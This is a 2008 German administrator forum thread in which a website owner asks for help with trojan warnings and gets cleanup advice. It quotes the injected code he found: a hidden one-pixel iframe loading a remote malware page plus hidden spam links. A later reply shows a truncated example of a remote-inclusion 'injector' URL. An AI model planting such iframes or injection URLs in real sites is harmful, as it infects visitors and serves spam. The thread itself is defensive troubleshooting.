Top-Themen

AppleEntwicklungHardwareInternetLinuxMicrosoftMultimediaNetzwerkeOff TopicSicherheitSonstige SystemeVirtualisierungWeiterbildungZusammenarbeit

Aktuelle Themen

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit

Probleme mit Trojaner Warnungen auf meinen Webseiten

Frage Internet

Mitglied: Pussemuckelpeter

Pussemuckelpeter (Level 1) - Jetzt verbinden

13.02.2008, aktualisiert 07.08.2008, 10115 Aufrufe, 6 Kommentare

Hallo zusammen

Ich habe da glaube ich ein ernstes Problem

Meine beiden Seiten, www.die-lehrstellenaktion.de und www.die-lehrstellenaktion.at scheinen von Trojanern / Viren befallen zu sein.

Bei www.die-lehrstellenaktion.de erhalte ich diese Warnungen Trojan-Downloader.JS.IESlice.s bzw. Trojan.JS.Redirector.e

Bei www.die-lehrstellenaktion.at wird unten links in der Statusleiste beim internen Seitenwechsel ganz kurz folgende URL angezeigt www.leohin.com/diamond/...


Laut 1&1 , meinem Webhoster können die nix finden.


Ich möchte meine Seiten sauber und sicher haben, doch weiß ich nicht wie.

Der Programmierer hat auch leider keine Lösung, da er mir die Seiten zum Selbstkosten Preis realisiert hat, ohne die die Umsetzung nicht möglich gewesen wäre.


Ich hoffe das mir jemand helfen kann. Ich selber habe null Ahnung von Webprogrammierung...

Gruß
Mitglied: kaiand1
13.02.2008 um 20:34 Uhr
du scheinst da ein/mehere Javascripte zu haben wo sich der Trojaner befindet bzw ein Script? was da nicht hingehört
jedoch ohne einsicht kannst nur du selber dich auf die Suche machen.
Die frage ist auch wie der Schadcode bei dir reingekommen ist
Sicherheitslücke? Fehlerhaftes Programieren?
Bitte warten ..
Mitglied: wiesi200
13.02.2008 um 21:05 Uhr
Gehört zwar nicht hier her aber, tolle Seite. Hab’s gleich unseren Ausbildungsmeister geschickt.
Das hat wirklich Respekt verdient.
Bitte warten ..
Mitglied: filippg
13.02.2008 um 22:11 Uhr
Hallo,

hast du noch eine Lokale Sicherung der Skripte? Und die Daten liegen in einer Datenbank? Der Trojaner (so vorhanden) muss ja irgendwo liegen. Wenn du also alle Skripte löschst unad anschließend von deinem Rechner (wo noch keine Viren drauf sind) neu hochlädst sollte auch der Trojaner weg sein.
Vorher sicherstellen, dass man von allem aktuelle Backups hat.

Gruß

Filipp
Bitte warten ..
Mitglied: LordGurke
13.02.2008 um 22:22 Uhr
Hat vielleicht jemand deine FTP-Daten geknackt?
Einfach mal die FTP-Passwörter ändern und nach Möglichkeit den sauberen Code vom eigenen Rechner wieder hochladen.
Bitte warten ..
Mitglied: Pussemuckelpeter
14.02.2008 um 07:10 Uhr
Hallo, vielen Dank für Eure / Ihre Antworten.

Ich habe das hier in den beiden index Dateien gefunden:

<? include("login.php");?>
</p> <p style="line-height:150%; margin-top:0; margin-bottom:0;">&nbsp;
</p><iframe src="http://leohin.com/diamond/i/index.php?out=2222" width=1 height=1 style="visibility: hidden"></iframe>
<div style="display:none"><a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/in ..." viagra</a>
<a href="http://www.communist-party.org.uk/articles/home/lorelamn/public_html/ma ..." levitra</a><a href="http://lothlorian.org.ua;>buy" viagra, buy xenical, viagra,buy levitra, porno</a><a href="http://www.ptshome.com/pressreleases/lego/map.html;>Lego" toys</a>
<a href="http://www.ptshome.com/pressreleases/lego/index.html;>Lego</ ..."
</div>


Ich habe bereits dem Programmiere gebeten diese Einträge zu löschen und das Loginfeld vor weiteren Angriffen zu schützen.

Wenn mir jemand sagen könnte wie wir / er dies am sichersten tun könnte wäre ich mehr als dankbar.

Nochmals muss ich erwähnen, das der Programmierer mein vollstes Vertrauen hat und die Seiten nicht hätten realisiert werden können, wenn er diese zu einem "normalen" Satz abgerechnet hätte ...

Gruß
Bitte warten ..
Mitglied: 0x0badc0de
07.08.2008 um 23:47 Uhr
Hallo...

!!! ACHTUNG... !!! Dieser Beitrag enthält eine Beispiel-URL für einen sog. Injector-Link. Obwohl diese URL zum Zeitpunkt der Erstellung dieses Beitrages ins Leere geht, sei jedem dringlichst geraten dem Link niemals zu folgen!
Der Trojan.JS.Redirector.e wütet auch gerade bei einem meiner "Kunden". Leider ist es bei diesem nicht damit getan, einfach ein vierenfreies Backup der Web-Anwendung einzuspielen. Bei dem Kunden war der Virus nach ca. 2 Tagen wieder da. Vermutlich befindet sich irgenwo in der Datenbank ein sog. Injector-Link welcher die Virendateien von einem Fremd-Server über die URL auf den Server lädt (z.B. mit http://never.follow.me/products_new.php?action=http%3A%2F%2Fwww.oriolma ... ... vom Forum gekürzt... Komplettansicht im Quelltext). Ein FTP-Zugang ist dafür nicht erforderlich.
Ich würde, bevor ich das Backup einspiele, die Datenbank eindringlich nach URLs dieser Art durchsuchen.

mfg
0x0badc0de
Bitte warten ..
Ähnliche Inhalte
Linux
Probleme beim Autostart Icewiesel im Vollbildmodus (1)

Frage von Thomas91 zum Thema Linux ...

Erkennung und -Abwehr
Phishing-Webseiten-Sammelstelle (5)

Frage von StefanKittel zum Thema Erkennung und -Abwehr ...

Microsoft Office
Probleme mit Bilddarstellung im Publisher 2016 (8)

Frage von takvorian zum Thema Microsoft Office ...

Neue Wissensbeiträge
Peripheriegeräte

Was beachten bei der Wahl einer USV Anlage im Serverschrank

(2)

Tipp von zetboxit zum Thema Peripheriegeräte ...

Windows 10

Das Windows 10 Creators Update ist auf dem Weg

(5)

Anleitung von BassFishFox zum Thema Windows 10 ...

Administrator.de Feedback

Tipp: Ungelöste Fragen ohne Antwort in Tickeransicht farblich hinterlegen

Tipp von pattern zum Thema Administrator.de Feedback ...

Viren und Trojaner

Neue Magazin Ausgabe: Malware und Angriffe abwehren

Information von Frank zum Thema Viren und Trojaner ...

Heiß diskutierte Inhalte
Windows Systemdateien
Warum System auf "C:" (29)

Frage von DzumoPRO zum Thema Windows Systemdateien ...

Cloud-Dienste
gelöst Bitcoins minen über Nacht? (16)

Frage von 1410640014 zum Thema Cloud-Dienste ...

Windows Server
gelöst Update BackupExec 2015 auf 2016 führt zu SQL-Server Problem (16)

Frage von montylein1981 zum Thema Windows Server ...

Batch & Shell
gelöst Batch um Benutzer aus Sitzung abzumelden (15)

Frage von zeroblue2005 zum Thema Batch & Shell ...